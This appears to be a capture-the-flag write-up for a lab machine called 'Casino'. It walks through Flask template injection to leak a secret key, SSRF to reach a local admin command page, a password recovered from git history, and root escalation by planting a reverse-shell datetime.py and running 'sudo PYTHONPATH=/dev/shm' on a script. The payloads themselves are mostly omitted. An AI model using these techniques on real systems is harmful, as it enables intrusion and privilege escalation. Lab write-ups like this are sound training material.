⇒ Casino is an medium difficulty linux machine that teaches us about :
- Flask SSTI [ Server Side Template Injection ]
- SSRF [ Server Side Request Forgery ]
- Python SETENV abuse to hijack library being imported.
Enumerating and performing SSTI
⇒ So when we visit the website we find the employees working and a few more names in the banned list
- So we have an user list now :
grey Carla Erlich Blockman Phil Alan Stu Mr.Chow Doug
⇒ After looking around for a file we see that search is vulnerable to SSTI as it executes
$ and returns 49 . We then read the items in the config using **
- So we got the secret key : i_L0v3$$$
⇒ We are able to login as Erlich user using the secret key we found from the config. When we try to play the game we get the following page :
⇒ Intercepting the request we notice something interesting , an BTC parameter that has an url. We previously saw that there was port 9000/tcp which is filtered, it could be only accessible locally. So we tried and visit it through this request and it worked :
- On the /admin page there’s an option that allows us to execute commands on the system :
- We ran id command and saw that it is running commands as user grey.
- We popped an shell as user grey :
Privilege Escalation ( grey to carla )
⇒ There’s an github repository in adminPanel folder
- Running git show . We find an commit that has carla user password :
carla : >F73SzS36>V$tJmc
- We switched to carla :
Privilege Escalation ( carla to root )
⇒ We can run an python script as root user and we also have SETENV permissions :
- Reading the python script we see that it performs simple things nothing vulnerable here.
⇒ But we saw that we have SETENV permissions which would allow us to specify PYTHONPATH to import an module. We can leverage this to hijack the library datetime being imported .
- Creating datetime.py in /dev/shm that has an python reverse shell
- Running the script as root with PYTHONPATH to /dev/shm
sudo PYTHONPATH=/dev/shm /opt/updateBTCPrice.py